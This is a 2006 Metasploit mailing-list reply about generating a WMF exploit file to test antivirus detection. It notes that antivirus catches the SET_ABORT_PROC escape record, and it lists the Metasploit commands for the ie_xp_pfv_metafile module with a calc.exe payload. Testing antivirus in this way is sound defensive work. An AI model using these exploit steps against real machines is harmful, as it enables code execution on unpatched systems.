Metasploit mailing list archives

Best way to capture the wmf file generated by the framework?

From: solata10 at yahoo.com (solata)
Date: Sun, 8 Jan 2006 07:26:38 -0800 (PST)

--- odinanne <odinanne at comcast.net> wrote:

I tested a number of system using the calc.exe file
referenced in an 
earlier post and AV quickly detected it.  Is it true
that metasploite 
generated wmfs are not likely to be detected due to
the random padding,


its true that metasploit generates random WMF, but it
still needs
to inclue ESCAPE function with SET_ABORT_PROC, and
seems that av
detects that in particular, so even if you generate
wmf with
metasploit it'll still get detected.

etc.  Is it possible to use the framework to create
a new wmf file to 
test AV?  If yes, how would this be done?  Thanks


sure its possible, try reading metasploit
documentation ...

basicly you need these commands : 

use ie_xp_pfv_metafile
set PAYLOAD win32_exec
set CMD calc.exe
exploit

then go on http://localhost:8080/file.tiff with
mozilla firefox
and save it to disk (if you use ie, file will be auto
opened).



                
__________________________________________ 
Yahoo! DSL ? Something to write home about. 
Just $16.99/mo. or less. 
dsl.yahoo.com

Current thread:

Best way to capture the wmf file generated by the framework? odinanne (Jan 07)
- Best way to capture the wmf file generated by the framework? solata (Jan 08)